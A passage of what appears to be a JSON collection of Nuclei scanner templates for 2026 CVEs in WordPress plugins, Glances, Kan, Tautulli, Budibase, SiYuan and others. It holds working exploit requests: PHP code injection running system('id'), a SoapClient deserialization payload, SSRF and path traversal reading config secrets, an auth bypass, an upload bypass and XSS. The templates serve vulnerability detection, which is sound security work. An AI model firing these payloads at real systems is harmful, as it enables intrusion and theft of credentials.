4b0a00483046022100f0046bfc329bf38ca5a1b7d0166a6d60ddcb8526d6468f077c351cf07ec017a7022100c546c56a5e811022dd2d026514ae12560633fa687cff4c3c654c2e491505e914:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-33017.yaml","vuln_id":"cve-2026-33017"},{"raw":"id: CVE-2026-3300\n\ninfo:\n  name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the \"Complex Calculation\" feature.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of Everest Forms Pro plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve\n    - https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584\n    - https://everestforms.net/changelog/\n    - https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-3300\n    epss-score: 0.39159\n    epss-percentile: 0.9853\n    cwe-id: CWE-94\n  metadata:\n    max-request: 3\n    verified: true\n    product: everest-forms-pro\n    vendor: wpeverest\n    fofa-query: body=\"/wp-content/plugins/everest-forms-pro/\"\n  tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt\"\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Everest Forms\")'\n          - 'compare_versions(version, \"<= 1.9.12\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        internal: true\n        group: 1\n        regex:\n          - 'Stable tag:\\s*([0-9.]+)'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/wp/v2/pages?per_page=100\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"evf-container\",\"data-formid\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: form_id\n        internal: true\n        group: 1\n        regex:\n          - 'data-formid=(?:\\\\\"|\")([0-9]+)'\n\n      - type: regex\n        name: nonce\n        internal: true\n        group: 1\n        regex:\n          - 'name=(?:\\\\\"|\")_wpnonce[0-9]+(?:\\\\\"|\")\\s+value=(?:\\\\\"|\")([a-f0-9]+)'\n\n      - type: regex\n        name: nonce_field\n        internal: true\n        group: 1\n        regex:\n          - 'name=(?:\\\\\"|\")(_wpnonce[0-9]+)(?:\\\\\"|\")\\s+value='\n\n      - type: regex\n        name: text_field\n        internal: true\n        group: 1\n        regex:\n          - 'evf-field-text[^>]*data-field-id=(?:\\\\\"|\")(field_[A-Za-z0-9]+)'\n\n      - type: regex\n        name: calc_field\n        internal: true\n        group: 1\n        regex:\n          - 'evf-field-number[^>]*data-field-id=(?:\\\\\"|\")(field_[A-Za-z0-9]+)'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'uid=[0-9]+\\([a-z_-]+\\)'\n\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n\n    extractors:\n      - type: regex\n        group: 0\n        regex:\n          - 'uid=[0-9]+\\([a-z_-]+\\)\\s*gid=[0-9]+\\([a-z_-]+\\)'\n# digest: 490a0046304402205448384020a52426a84eed226a03b7a1b6c2389c873a17b8ba3ecb7445305fa402206c9c5892f4216598a6bc8d4db8e82bb8aa04d699bc19fed12c87c581322c76ba:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3300.yaml","vuln_id":"cve-2026-3300"},{"raw":"id: CVE-2026-3296\n\ninfo:\n  name: Everest Forms WordPress Plugin <= 3.4.3 - PHP Object Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code when an administrator views malicious form entries, potentially leading to full site compromise.\n  remediation: |\n    Update to the latest version beyond 3.4.3.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms/\n    - https://plugins.trac.wordpress.org/browser/everest-forms/\n    - https://cisa.gov/known-exploited-vulnerabilities-catalog\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3296\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-3296\n    cwe-id: CWE-502\n    epss-score: 0.03469\n    epss-percentile: 0.88546\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: wpeverest\n    product: everest_forms\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/everest-forms/\"\n    fofa-query: body=\"/wp-content/plugins/everest-forms/\"\n    publicwww-query: \"/wp-content/plugins/everest-forms/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,everest-forms,php-object-injection,vkev,vuln,passive\n\nvariables:\n  oob_uri: \"http://{{interactsh-url}}/\"\n  oob_len: \"{{len(oob_uri)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/everest-forms/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'Everest Forms')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Referer: {{RootURL}}\n\n        action=evf_submit_form&evf_id=1&evf-field-1=test&evf-fields-meta=O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A{{oob_len}}%3A%22http%3A%2F%2F{{interactsh-url}}%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A{{oob_len}}%3A%22http%3A%2F%2F{{interactsh-url}}%2F%22%3Bs%3A15%3A%22_soap_version%22%3Bi%3A1%3Bs%3A13%3A%22_proxy_host%22%3BN%3B%7D\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - \"compare_versions(version, '<= 3.4.3')\"\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 490a0046304402202530a22687e7b0a656dc837ddf69404159353440b73fa7da9d510460f6464d4002202d5d517990a4ccd457367fac6bfc0dcc9110c619fcf1cca7f532e52baba392aa:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3296.yaml","vuln_id":"cve-2026-3296"},{"raw":"id: CVE-2026-32596\n\ninfo:\n  name: Glances - Information Disclosure\n  author: theamanrawat\n  severity: high\n  description: |\n    Glances < 4.5.2 contains an information disclosure vulnerability caused by the web server running without authentication by default, letting remote attackers access sensitive system information including credentials, exploit requires no special privileges.\n  impact: |\n    Remote attackers can access sensitive system information including credentials, risking data exposure and system compromise.\n  remediation: |\n    Update to version 4.5.2 or later.\n  reference:\n    - https://github.com/nicolargo/glances/security/advisories/GHSA-wvxv-4j8q-4wjq\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-32596\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-32596\n    epss-score: 0.0155\n    epss-percentile: 0.73976\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2026,glances,exposure,unauth,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/4/system\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"os_name\", \"os_version\", \"hostname\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/4/processlist\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"cmdline\", \"cpu_times\", \"memory_info\")'\n        condition: and\n# digest: 490a0046304402206b9d49bf4482e591c7a6569d19a07843ca974c8327c4938cfc7ded80720ec7d8022053c9027773534b9468190d3b1d60bff3a00287ecc3f12aa1f571f1b4b99dc203:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-32596.yaml","vuln_id":"cve-2026-32596"},{"raw":"id: CVE-2026-32583\n\ninfo:\n  name: Webnus Inc. Modern Events Calendar - Broken Access Control\n  author: theamanrawat\n  severity: medium\n  description: |\n    Webnus Inc. Modern Events Calendar <= 7.29.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers bypass authorization, exploit requires no special privileges.\n  impact: |\n    Attackers can bypass authorization and access restricted functionality or data, potentially compromising system integrity.\n  remediation: |\n    Update to the latest version beyond 7.29.0.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-32583\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-32583\n    epss-score: 0.007\n    epss-percentile: 0.51724\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: webnus\n    product: modern_events_calendar\n    framework: wordpress\n  tags: cve2026,cve,wordpress,wp-plugin,wp,mec,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=mec_speaker_adding\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"mec_fes_speakers\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207f6a69de0e48211881b25ba050bfe7d129fb8b467edde511430f2b8a0e1cb87f022037b689a590415a0ebb0b63c36475267ba15b89827065b308a82b5869cc9ef491:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-32583.yaml","vuln_id":"cve-2026-32583"},{"raw":"id: CVE-2026-32475\n\ninfo:\n  name: Elementor Pro <=4.2.1 - Unauthenticated Arbitrary File Upload via Form Handler\n  author: pdteam\n  severity: critical\n  description: |\n    Elementor Pro plugin for WordPress in versions <=4.2.1 is vulnerable to unauthenticated arbitrary file upload in the Forms module File Upload field. The validation() and process_field() methods iterate over submitted file entries with different early-exit logic for UPLOAD_ERR_NO_FILE entries. When an attacker submits two file parts for the same upload field — an empty first entry (blank filename triggering UPLOAD_ERR_NO_FILE) followed by a payload — validation() returns early after the empty entry without ever type-checking the payload, while process_field() only skips (continue) the empty entry and moves the payload to wp-content/uploads/elementor/forms/. The AJAX action elementor_pro_forms_send_form requires no authentication or nonce.\n  impact: |\n    Unauthenticated remote code execution is achievable by uploading a PHP file to a web-accessible public directory (wp-content/uploads/elementor/forms/). Any file type can bypass the extension blocklist, including PHP webshells.\n  remediation: |\n    Update Elementor Pro to version 4.2.2 or later. The fix aligns the validation() and process_field() loops to consistently handle empty file entries.\n  reference:\n    - https://patchstack.com/articles/critical-unauthenticated-file-upload-to-rce-in-elementor-pro-plugin/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-32475\n    - https://github.com/absholi7ly/Elementor-Pro-Unauthenticated-Arbitrary-File-Upload-to-RCE\n    - https://www.bleepingcomputer.com/news/security/critical-elementor-pro-bug-exposes-wordpress-sites-to-rce-attacks/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.0\n    cve-id: CVE-2026-32475\n    cwe-id: CWE-434\n    epss-score: 0.02374\n    epss-percentile: 0.83108\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: elementor\n    product: elementor-pro\n    framework: wordpress\n    fofa-query: body=\"/plugins/elementor-pro/\"\n    shodan-query: html:\"/plugins/elementor-pro/\"\n    publicwww-query: \"/wp-content/plugins/elementor-pro/\"\n  tags: cve,cve2026,elementor,elementor-pro,wordpress,wp-plugin,file-upload,unauth,rce,intrusive,vkev,vuln\n\nvariables:\n  marker: \"{{rand_text_alpha(12)}}\"\n  fname: \"{{rand_text_alpha(8)}}.txt\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/elementor-pro/readme.txt\"\n\n    matchers:\n      - type: word\n        words:\n          - \"Elementor Pro\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    extractors:\n      - type: regex\n        name: post_id\n        group: 1\n        regex:\n          - 'name=\"post_id\"\\s+value=\"(\\d+)\"'\n          - '\"post_id\"\\s*:\\s*\"?(\\d+)\"?'\n        internal: true\n\n      - type: regex\n        name: form_id\n        group: 1\n        regex:\n          - 'name=\"form_id\"\\s+value=\"([a-f0-9A-F]{4,16})\"'\n          - '\"form_id\"\\s*:\\s*\"([a-f0-9A-F]{4,16})\"'\n        internal: true\n\n      - type: regex\n        name: field_id\n        group: 1\n        regex:\n          - 'name=\"form_fields\\[([^\\]]+)\\]\"\\s[^>]*type=\"file\"'\n          - 'type=\"file\"\\s[^>]*name=\"form_fields\\[([^\\]]+)\\]\"'\n        internal: true\n\n      - type: regex\n        name: text_field\n        group: 1\n        regex:\n          - 'name=\"form_fields\\[([^\\]]+)\\]\"\\s[^>]*type=\"text\"'\n          - 'type=\"text\"\\s[^>]*name=\"form_fields\\[([^\\]]+)\\]\"'\n        internal: true\n\n      - type: regex\n        name: email_field\n        group: 1\n        regex:\n          - 'name=\"form_fields\\[([^\\]]+)\\]\"\\s[^>]*type=\"email\"'\n          - 'type=\"email\"\\s[^>]*name=\"form_fields\\[([^\\]]+)\\]\"'\n        internal: true\n\n    matchers:\n      - type: word\n        words:\n          - \"elementor-form\"\n          - 'type=\"file\"'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=WebKitFormBoundarySBDsMGAl\n        X-Requested-With: XMLHttpRequest\n        Accept: application/json, text/javascript, */*; q=0.01\n        Connection: close\n\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"action\"\n\n        elementor_pro_forms_send_form\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"post_id\"\n\n        {{post_id}}\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"form_id\"\n\n        {{form_id}}\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"queried_id\"\n\n        {{post_id}}\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"referrer\"\n\n        {{BaseURL}}\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"form_fields[{{text_field}}]\"\n\n        Test User\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"form_fields[{{email_field}}]\"\n\n        test@example.com\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"form_fields[{{field_id}}][0]\"; filename=\"\"\n        Content-Type: application/octet-stream\n\n        --WebKitFormBoundarySBDsMGAl\n        Content-Disposition: form-data; name=\"form_fields[{{field_id}}][1]\"; filename=\"{{fname}}\"\n        Content-Type: text/plain\n\n        CVE-2026-32475-PoC-{{marker}}\n        --WebKitFormBoundarySBDsMGAl--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"not_allowed\"\n          - \"are not allowed to access this page\"\n          - \"permission_denied\"\n          - \"invalid_nonce\"\n          - \"rest_forbidden\"\n        negative: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: upload_confirmed\n        regex:\n          - '\"success\"\\s*:\\s*true'\n# digest: 4a0a00473045022038e31a5080b4a494c9cfdf752702887e84d3f953ac7e41e4c83945b521654dff022100c8c7ba1d90697ca670c083434eecb08b4696bb90f37254215dc7ba9dc443aa3f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-32475.yaml","vuln_id":"cve-2026-32475"},{"raw":"id: CVE-2026-32255\n\ninfo:\n  name: Kan <= 0.5.4 - Server-Side Request Forgery\n  author: prithvee07\n  severity: high\n  description: |\n    Kan, an open-source project management tool (Trello alternative), versions 0.5.4 and below are vulnerable to an unauthenticated Server-Side Request Forgery in the /api/download/attatchment endpoint. The endpoint passes the attacker-controlled `url` query parameter straight to a server-side fetch() without validating the destination host, allowing an unauthenticated attacker to make the server issue arbitrary outbound HTTP requests and read back the full response body.\n  impact: |\n    Unauthenticated attackers can force the server to issue requests to internal-only services, such as cloud metadata endpoints or internal APIs, and read the complete response body, potentially exposing credentials, configuration data, and other sensitive internal information.\n  remediation: |\n    Upgrade Kan to version 0.5.5 or later, which validates the requested host against the configured S3_ENDPOINT before making the upstream request.\n  reference:\n    - https://github.com/kanbn/kan/security/advisories/GHSA-qrx8-9hc6-jvqg\n    - https://github.com/kanbn/kan/commit/53397d8e81dc1494d94132848c1f0416f1152bd7\n    - https://github.com/kanbn/kan/releases/tag/v0.5.5\n    - https://github.com/kOaDT/poc-cve-2026-32255\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-32255\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-32255\n    epss-score: 0.20776\n    epss-percentile: 0.97433\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: kanbn\n    product: kan\n    shodan-query: http.title:\"Kan\"\n    fofa-query: title=\"Kan\" && body=\"_next\"\n  tags: cve,cve2026,kan,ssrf,unauth,oast,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /api/download/attatchment?url=http://{{interactsh-url}}/{{randstr}}&filename={{randstr}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"filename=\\\"{{randstr}}\\\"\")'\n        condition: and\n# digest: 4b0a00483046022100940fb0de8668f2addcbd810dc3ea50508d4fc1f65719ebae20ebbef4a4caed360221008a90db088c93c599fdb48eb8e42f4d481ac542b622a0f72c307fe825a152fa3a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-32255.yaml","vuln_id":"cve-2026-32255"},{"raw":"id: CVE-2026-32230\n\ninfo:\n  name: Uptime-Kuma < v1.23.0 - Improper Access Control\n  author: ritikchaddha\n  severity: medium\n  description: |\n    Uptime-Kuma before v1.23.0 is vulnerable to an information disclosure issue due to missing authorization on the /api/badge/1/ping/24 endpoint. An unauthenticated attacker can access this endpoint to leak ping statistics, such as average ping and ping history, for existing monitors without needing access to the protected status page. This can lead to unintended exposure of internal monitoring data.\n  impact: |\n    Information disclosure of monitor ping data to unauthenticated attackers, potentially aiding reconnaissance efforts.\n  remediation: |\n    Upgrade to Uptime-Kuma version 1.23.0 or later, which patches the vulnerable endpoint by introducing proper authorization checks.\n  reference:\n    - https://github.com/advisories/GHSA-c7hf-c5p5-5g6h\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-32230\n  classification:\n    cve-id: CVE-2026-32230\n    epss-score: 0.00905\n    epss-percentile: 0.58297\n    cwe-id: CWE-862\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cpe: cpe:2.3:a:louislam:uptime-kuma:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: louislam\n    product: uptime-kuma\n    shodan-query: title:\"uptime-kuma\"\n  tags: cve,cve2026,uptime-kuma,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/badge/1/ping/24\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'Avg. Ping (')\"\n        condition: and\n# digest: 490a0046304402204de9a3b7a06357a2f8c6311c87401d2b57732cf32be04ca3ee81c1e66e687a3e02200be94a5650cf748d7a1a14ff88a6187ae890ff1b3c5a00e095514a0cb02d42f7:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-32230.yaml","vuln_id":"cve-2026-32230"},{"raw":"id: CVE-2026-31831\n\ninfo:\n  name: Tautulli <= 2.16.1 - Path Traversal\n  author: WRG-11\n  severity: high\n  description: |\n    Tautulli is a monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the `/newsletter/image/images` endpoint joins user-controlled path segments onto the newsletter image directory without containment validation. Authentication is not required for this endpoint, allowing unauthenticated attackers to perform directory traversal and read arbitrary files accessible to the server process. Reading `config/config.ini` discloses the API key, the hashed admin password, the JWT token secret, and the Plex Media Server token. Version 2.17.0 fixes this issue.\n  impact: |\n    Unauthenticated attackers can read arbitrary files accessible to the server, including `config.ini` (API key, hashed admin password, JWT secret, Plex token) and `tautulli.db` (active JWT tokens).\n  remediation: |\n    Update to version 2.17.0 or later.\n  reference:\n    - https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-31831\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-31831\n    epss-score: 0.01965\n    epss-percentile: 0.79478\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: tautulli\n    product: tautulli\n    shodan-query: http.title:\"Tautulli\"\n  tags: cve,cve2026,tautulli,lfi,traversal\n\nhttp:\n  - raw:\n      - |\n        GET /newsletter/image/images/..%2F..%2F..%2F..%2F..%2F..%2Fconfig%2Fconfig.ini HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"[General]\"\n          - \"[PMS]\"\n          - \"pms_identifier\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/png\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450221008d2523383e4f6c960ea070bdda1d1ef7ffbfe87018cf97e4a8ffcd3f7fa9f10502204bfef7c6d53875681510f8cfdd5be4385ac5f62ac3a84c62be0c3fcec414ddbe:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-31831.yaml","vuln_id":"cve-2026-31831"},{"raw":"id: CVE-2026-31816\n\ninfo:\n  name: Budibase - Authentication Bypass\n  author: theamanrawat\n  severity: critical\n  description: |\n    Budibase <= 3.31.4 contains an authentication bypass caused by unanchored regex in authorized() middleware matching webhook path patterns in query strings, letting unauthenticated remote attackers access any server-side API endpoint, exploit requires crafted request with webhook pattern in URL.\n  impact: |\n    Unauthenticated remote attackers can bypass all authentication and authorization to access any server-side API endpoint.\n  remediation: |\n    Update to a version later than 3.31.4 or latest available version.\n  reference:\n    - https://github.com/Budibase/budibase/security/advisories/GHSA-gw94-hprh-4wj8\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-31816\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-31816\n    epss-score: 0.15339\n    epss-percentile: 0.96618\n    cwe-id: CWE-74\n  metadata:\n    max-request: 1\n    verified: true\n  tags: cve,cve2026,budibase,auth-bypass,vuln,unauthenticated,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/ta_users/search?/webhooks/trigger HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-budibase-app-id: {{app_id}}\n\n        {\"query\":{},\"limit\":1000}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"email\", \"roleId\", \"status\")'\n        condition: and\n# digest: 4a0a00473045022100eda42aad9d97c393d6a0dac5c13dfb774924032dc76520c2c871b4cf1eb7bcee02207d51fa8fb7b255e10cd29671756da58a02de28d07a28f45befc1135d562128ac:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-31816.yaml","vuln_id":"cve-2026-31816"},{"raw":"id: CVE-2026-31809\n\ninfo:\n  name: SiYuan <= v3.5.9 - Cross Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   SiYuan v3.5.10 contains a reflected XSS caused by improper sanitization of javascript: href attributes allowing ASCII control characters to bypass prefix checks in SVG sanitizer, letting unauthenticated attackers execute JavaScript via /api/icon/getDynamicIcon.\n  impact: |\n   Unauthenticated attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks.\n  remediation: |\n   Update to version 3.5.10 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pmc9-f5qr-2pcr\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-31809\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-31809\n    epss-score: 0.00505\n    epss-percentile: 0.42198\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: siyuan-note\n    product: siyuan\n    shodan-query: http.favicon.hash:-1450125239\n  tags: cve,cve2026,siyuan,xss,bypass\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/system/version\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'compare_versions(ver, \">= 0.0.1\", \"<= 3.5.9\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: ver\n        json:\n          - '.data'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca+href%3D%22java%26%239%3Bscript%3Aalert%28document.domain%29%22%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<a href=\"java&#9;script:alert(document.domain)\">'\n          - 'id=\"dynamic_icon_type8'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"image/svg+xml\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100a83d378340c21c592589f80252a8f93448f4f2bb0c76a267302c235a23b90429022025d51080c40c1c8d2051f5403b4c746ffd5dad3ea5b61067bcadb6e5e6d4f78e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-31809.yaml","vuln_id":"cve-2026-31809"},{"raw":"id: CVE-2026-31807\n\ninfo:\n  name: SiYuan <= v3.5.9 - SVG Animate Element XSS\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   SiYuan <= v3.5.9 contains a reflected XSS caused by insufficient SVG sanitization allowing SVG animation elements to inject executable JavaScript in /api/icon/getDynamicIcon endpoint, letting unauthenticated attackers execute scripts.\n  impact: |\n   Unauthenticated attackers can execute arbitrary JavaScript, leading to session hijacking or other client-side attacks.\n  remediation: |\n   Update to version 3.5.10 or later.\n  reference:\n    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-5hc8-qmg8-pw27\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-31807\n  classification:\n    cvss-metrics: 